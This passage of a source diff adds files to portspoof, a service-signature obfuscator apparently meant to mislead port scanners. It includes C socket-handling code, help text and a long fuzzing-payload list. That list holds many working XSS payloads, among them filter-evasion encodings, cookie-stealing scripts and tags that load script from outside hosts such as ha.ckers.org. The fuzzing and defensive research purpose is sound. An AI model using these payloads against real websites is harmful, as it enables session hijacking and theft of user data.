+				fprintf(stdout,"signature sent -> ");	
+				for(int t=0;t<buffertosendsize;t++)
+				{
+						if(*(buffertosend+t)==0)
+							fprintf(stdout,"\\00");
+						else if(*(buffertosend+t)=='\n')
+							fprintf(stdout,"\\n");
+						else if(*(buffertosend+t)=='\r')
+							fprintf(stdout,"\\r");
+						else
+							fprintf(stdout,"\\%x",*(buffertosend+t));
+				}
+				fprintf(stdout,"\n---\n");
+			
+				}
+				fflush(stdout);
+	            
+				
+				if(send(threads[tid].clients[i], buffertosend, buffertosendsize,0)==-1)
+					perror("Send to socket failed");
+				
+				close(threads[tid].clients[i]);
+				
+				pthread_mutex_lock(&new_connection_mutex);
+				threads[tid].clients[i] = 0;
+				threads[tid].client_count--;
+				pthread_mutex_unlock(&new_connection_mutex);
+
+				}
+
+
+			}
+			else
+			pthread_mutex_unlock(&new_connection_mutex);
+		    
+		}
+	}
+}

src/src/connection.h

@@ -0,0 +1,74 @@
+/*
+ *   portspoof       Service signature obfucastor 
+ *   Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+ *
+ *   This program is free software; you can redistribute it and/or modify it
+ *   under the terms of the GNU General Public License as published by the
+ *   Free Software Foundation; either version 2 of the License, or (at your
+ *   option) any later version.
+ * 
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ *   See the GNU General Public License for more details.
+ * 
+ *   You should have received a copy of the GNU General Public License along
+ *   with this program; if not, see <http://www.gnu.org/licenses>.
+ * 
+ *   Linking portspoof statically or dynamically with other modules is making
+ *   a combined work based on portspoof. Thus, the terms and conditions of
+ *   the GNU General Public License cover the whole combination.
+ * 
+ *   In addition, as a special exception, the copyright holder of portspoof
+ *   gives you permission to combine portspoof with free software programs or
+ *   libraries that are released under the GNU LGPL. You may copy
+ *   and distribute such a system following the terms of the GNU GPL for
+ *   portspoof and the licenses of the other code concerned.
+ * 
+ *   Note that people who make modified versions of portspoof are not obligated
+ *   to grant this special exception for their modified versions; it is their
+ *   choice whether to do so. The GNU General Public License gives permission
+ *   to release a modified version without this exception; this exception
+ *   also makes it possible to release a modified version which carries
+ *   forward this exception.
+ */
+
+#include <pthread.h>
+#include "threads.h"
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <assert.h>  
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <netinet/in.h>
+#include <sys/sysctl.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <err.h>
+#include <errno.h>
+#include <stdio.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+
+#include "revregex.h"
+#include "Configuration.h"
+
+#define SO_ORIGINAL_DST 80
+#define TCPSTATES
+
+
+
+extern Thread threads[MAX_THREADS];
+
+class Configuration;
+extern Configuration* configuration;
+
+void nonblock(int sockfd);
+void* process_connection(void *arg);

src/src/fuzz.txt

@@ -0,0 +1,17 @@
+-> Reading fuzzing payloads from a file!
+Usage: portspoof [OPTION]...
+Portspoof - service signature obfuscator.
+
+-i             bind to a user defined IP address
+-p			  bind to a user defined PORT number
+-s			  custom signture file
+-c			  configuration file
+-l			  log port scanning alerts to a file
+-d			  disable syslog
+-v			  be verbose
+-f			  read fuzz payload list
+-1			  generate fuzzing payloads
+-n			  nmap wrap fuzz signatures
+-h			  display this help and exit
+
+Without any OPTION - use default values and continue

src/src/fuzz_nmap_signatures

@@ -0,0 +1,2 @@
+220 __FUZZ__ ESMTP OpenSMTPD\r\n
+550 4m2v4 (__FUZZ__)

src/src/fuzz_payloads

@@ -0,0 +1,304 @@
+WOOT
+A
+0AAAAAAAAAAAAAAAAAA
+<SCRIPT>alert('XSS');</SCRIPT>
+'';!--"<XSS>=&{()}
+<SCRIPT%20SRC=http://ha.ckers.org/xss.js></SCRIPT>
+<IMG%20SRC="javascript:alert('XSS');">
+<IMG%20SRC=javascript:alert('XSS')>
+<IMG%20SRC=JaVaScRiPt:alert('XSS')>
+<IMG%20SRC=javascript:alert(&quot;XSS&quot;)>
+<IMG%20SRC=`javascript:alert("RSnake%20says,%20'XSS'")`>
+<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
+SRC=&#10<IMG%206;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<IMG%20SRC="jav	ascript:alert('XSS');">
+<IMG%20SRC="jav&#x09;ascript:alert('XSS');">
+<IMG%20SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG%20SRC="jav&#x0D;ascript:alert('XSS');">
+<IMG%20SRC="%20&#14;%20%20javascript:alert('XSS');">
+<SCRIPT/XSS%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT%20SRC=http://ha.ckers.org/xss.js?<B>
+<IMG%20SRC="javascript:alert('XSS')"
+<SCRIPT>a=/XSS/
+\";alert('XSS');//
+<INPUT%20TYPE="IMAGE"%20SRC="javascript:alert('XSS');">
+<BODY%20BACKGROUND="javascript:alert('XSS')">
+<BODY%20ONLOAD=alert('XSS')>
+<IMG%20DYNSRC="javascript:alert('XSS')">
+<IMG%20LOWSRC="javascript:alert('XSS')">
+<BGSOUND%20SRC="javascript:alert('XSS');">
+<BR%20SIZE="&{alert('XSS')}">
+<LAYER%20SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+<LINK%20REL="stylesheet"%20HREF="javascript:alert('XSS');">
+<LINK%20REL="stylesheet"%20HREF="http://ha.ckers.org/xss.css">
+<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+<META%20HTTP-EQUIV="Link"%20Content="<http://ha.ckers.org/xss.css>;%20REL=stylesheet">
+<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
+<IMG%20SRC='vbscript:msgbox("XSS")'>
+<IMG%20SRC="mocha:[code]">
+<IMG%20SRC="livescript:[code]">
+<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=javascript:alert('XSS');">
+<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+<META%20HTTP-EQUIV="Link"%20Content="<javascript:alert('XSS')>;%20REL=stylesheet">
+<META%20HTTP-EQUIV="refresh"%20CONTENT="0;%20URL=http://;URL=javascript:alert('XSS');">
+<IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>
+<FRAMESET><FRAME%20SRC="javascript:alert('XSS');"></FRAMESET>
+<TABLE%20BACKGROUND="javascript:alert('XSS')">
+<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
+<DIV%20STYLE="background-image:%20url(&#1;javascript:alert('XSS'))">
+<DIV%20STYLE="width:%20expression(alert('XSS'));">
+<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
+<IMG%20STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+<XSS%20STYLE="xss:expression(alert('XSS'))">
+exp/*<XSS%20STYLE='no\xss:noxss("*//*");
+<STYLE%20TYPE="text/javascript">alert('XSS');</STYLE>
+<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A%20CLASS=XSS></A>
+<STYLE%20type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
+<BASE%20HREF="javascript:alert('XSS');//">
+<OBJECT%20TYPE="text/x-scriptlet"%20DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+<OBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param%20name=url%20value=javascript:alert('XSS')></OBJECT>
+getURL("javascript:alert('XSS')")
+a="get";
+<!--<value><![CDATA[<XML%20ID=I><X><C><![CDATA[<IMG%20SRC="javas<![CDATA[cript:alert('XSS');">
+<XML%20SRC="http://ha.ckers.org/xsstest.xml"%20ID=I></XML>
+<HTML><BODY>
+<SCRIPT%20SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
+<!--#exec%20cmd="/bin/echo%20'<SCRIPT%20SRC'"--><!--#exec%20cmd="/bin/echo%20'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
+<?%20echo('<SCR)';
+<META%20HTTP-EQUIV="Set-Cookie"%20Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
+<HEAD><META%20HTTP-EQUIV="CONTENT-TYPE"%20CONTENT="text/html;%20charset=UTF-7">%20</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+<SCRIPT%20a=">"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT%20a=">"%20''%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT%20"a='>'"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT%20a=`>`%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
+<<scr\0ipt/src=http://xss.com/xss.js></script
+%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
+'%20onmouseover=alert(/Black.Spook/)
+"><iframe%20src="http://google.com"%%203E
+'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
+x”</title><img%20src%3dx%20onerror%3dalert(1)>
+<script>%20document.getElementById(%22safe123%22).setCapture();%20document.getElementById(%22safe123%22).click();%20</script>
+<script>Object.defineProperties(window,%20{Safe:%20{value:%20{get:%20function()%20{return%20document.cookie}}}});alert(Safe.get())</script>
+<script>var%20x%20=%20document.createElement('iframe');document.body.appendChild(x);var%20xhr%20=%20x.contentWindow.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();</script>
+<script>(function()%20{var%20event%20=%20document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22,%20true,%20true,%20window,%200,%200,%200,%200,%200,%20false,%20false,%20false,%20false,%200,%20null);var%20fakeData%20=%20[event,%20{isTrusted:%20true},%20event];arguments.__defineGetter__('0',%20function()%20{%20return%20fakeData.pop();%20});alert(Safe.get.apply(null,%20arguments));})();</script>
+<script>var%20script%20=%20document.getElementsByTagName('script')[0];%20var%20clone%20=%20script.childNodes[0].cloneNode(true);%20var%20ta%20=%20document.createElement('textarea');%20ta.appendChild(clone);%20alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
+<script>xhr=new%20ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
+<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
+<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
+<%73%63%72%69%70%74>%20%64%20=%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22);%20%64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65));%20%61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65%20=%20'(%2e%2a%3f)'%22)[%31]);%20</%73%63%72%69%70%74>
+<script>%20var%20xdr%20=%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);%20%20xdr.open(%22get%22,%20%22/xssme2%3Fa=1%22,%20true);%20xdr.onreadystatechange%20=%20function()%20{%20try{%20%20%20var%20c;%20%20%20if%20(c=xdr.responseText.match(/document.cookie%20=%20'(.*%3F)'/)%20)%20%20%20%20alert(c[1]);%20}catch(e){}%20};%20%20xdr.send();%20</script>
+<iframe%20id=%22ifra%22%20src=%22/%22></iframe>%20<script>ifr%20=%20document.getElementById('ifra');%20ifr.contentDocument.write(%22<scr%22%20%2b%20%22ipt>top.foo%20=%20Object.defineProperty</scr%22%20%2b%20%22ipt>%22);%20foo(window,%20'Safe',%20{value:{}});%20foo(Safe,%20'get',%20{value:function()%20{%20%20%20%20return%20document.cookie%20}});%20alert(Safe.get());</script>
+<script>alert(document.head.innerHTML.substr(146,20));</script>
+<script>alert(document.head.childNodes[3].text)</script>
+<script>var%20request%20=%20new%20XMLHttpRequest();request.open('GET',%20'http://html5sec.org/xssme2',%20false);request.send(null);if%20(request.status%20==%20200){alert(request.responseText.substr(150,41));}</script>
+<script>Object.defineProperty(window,%20'Safe',%20{value:{}});Object.defineProperty(Safe,%20'get',%20{value:function()%20{return%20document.cookie}});alert(Safe.get())</script>
+<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
+<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return%20top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
+<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>
+<script>%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true});%20</script>
+<script>%20var+MouseEvent=function+MouseEvent(){};%20MouseEvent=MouseEvent%20var+test=new+MouseEvent();%20test.isTrusted=true;%20test.type='click';%20%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click(test);%20</script>
+<script>%20%20(function%20(o)%20{%20%20%20function%20exploit(x)%20{%20%20%20%20if%20(x%20!==%20null)%20%20%20%20%20alert('User%20cookie%20is%20'%20%2B%20x);%20%20%20%20else%20%20%20%20%20console.log('fail');%20%20%20}%20%20%20%20%20%20o.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__('isTrusted',%20function%20()%20{%20return%20true;%20});%20%20%20%20exploit(Safe.get());%20%20%20};%20%20%20%20%20%20var%20e%20=%20document.createEvent('MouseEvent');%20%20%20e.initEvent('click',%20true,%20true);%20%20%20o.dispatchEvent(e);%20%20})(document.getElementById('safe123'));%20</script>
+<iframe%20src=/%20onload=eval(unescape(this.name.replace(/\/g,null)))%20name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
+<script>%20%20%20%20%20function%20b()%20{%20return%20Safe.get();%20}%20alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true}));%20</script>%20
+<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=alert(this.ownerDocument.cookie)%20width=0%20height=%200%20/>%20#
+<script>%20%20function%20foo(elem,%20doc,%20text)%20{%20%20%20elem.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__(text[0],%20function%20()%20{%20return%20true%20})%20%20%20%20alert(Safe.get());%20%20%20};%20%20%20%20%20%20var%20event%20=%20doc.createEvent(text[1]);%20%20%20event.initEvent(text[2],%20true,%20true);%20%20%20elem.dispatchEvent(event);%20%20}%20</script>%20<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=foo(this,this.ownerDocument,this.name.split(/,/))%20name=isTrusted,MouseEvent,click%20width=0%20height=0%20/>%20#%20
+<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
+<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>#
+<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
+<script%20for=document%20event=onreadystatechange>getElementById('safe123').click()</script>
+<script>%20var+x+=+showModelessDialog+(this);%20alert(x.document.cookie);%20</script>
+<script>%20location.href%20=%20'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=';%20</script>
+<iframe%20src=%22404%22%20onload=%22frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<iframe%20src=%22404%22%20onload=%22content.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<iframe%20src=%22404%22%20onload=%22self.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<iframe%20src=%22404%22%20onload=%22top.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<script>var%20x%20=%20safe123.onclick;safe123.onclick%20=%20function(event)%20{var%20f%20=%20false;var%20o%20=%20{%20isTrusted:%20true%20};var%20a%20=%20[event,%20o,%20event];var%20get;event.__defineGetter__('type',%20function()%20{get%20=%20arguments.callee.caller.arguments.callee;return%20'click';});var%20_alert%20=%20alert;alert%20=%20function()%20{%20alert%20=%20_alert%20};x.apply(null,%20a);(function()%20{arguments.__defineGetter__('0',%20function()%20{%20return%20a.pop();%20});alert(get());})();};safe123.click();</script>#
+<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
+<textarea%20id=ta%20onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;)%20autofocus></textarea>
+<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
+<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20id=iframe%20src=%22javascript:parent.x(window)%22><iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+<textarea%20id=ta%20onfocus=%22write('<script>alert(1)</script>')%22%20autofocus></textarea>
+<object%20data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
+<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20};%20open(%22javascript:opener.x(window)%22)</script>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
+<iframe%20src=`http://xssme.html5sec.org/?xss=<iframe%20onload=%22xhr=new%20XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
+<a%20target="x"%20href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
+<a%20target="x"%20href="xssme?xss=<script>var%20cl=Components;var%20fcc=String.fromCharCode;doc=cl.lookupMethod(top,%20fcc(100,111,99,117,109,101,110,116)%20)(%20);cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe%20src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b%20name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
+<a%20target="x"%20href="xssme?xss=<script>find('cookie');%20var%20doc%20=%20getSelection().getRangeAt(0).startContainer.ownerDocument;%20console.log(doc);%20var%20xpe%20=%20new%20XPathEvaluator();%20var%20nsResolver%20=%20xpe.createNSResolver(doc);%20var%20result%20=%20xpe.evaluate('//script/text()',%20doc,%20nsResolver,%200,%20null);%20alert(result.iterateNext().data.match(/cookie%20=%20'(.*?)'/)[1])</script>
+<a%20target="x"%20href="xssme?xss=<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20src=%22javascript:parent.x(window);%22></iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'.',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+Garethy%20Salty%20Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(),%20'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
+<a%20href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
+<div%20onmouseover='alert&lpar;1&rpar;'>DIV</div>
+<iframe%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20onmouseover="prompt(1)">
+<a%20href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
+<embed%20src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">%20?
+<object%20data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
+<var%20onmouseover="prompt(1)">On%20Mouse%20Over</var>?
+<a%20href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click%20Here</a>
+<img%20src="/"%20=_="%20title="onerror='prompt(1)'">
+<%<!--'%><script>alert(1);</script%20-->
+<script%20src="data:text/javascript,alert(1)"></script>
+<iframe/src%20\/\/onload%20=%20prompt(1)
+<iframe/onreadystatechange=alert(1)
+<svg/onload=alert(1)
+<input%20value=<><iframe/src=javascript:confirm(1)
+<input%20type="text"%20value=``<div/onmouseover='alert(1)'>X</div>
+http://www.<script>alert(1)</script%20.com
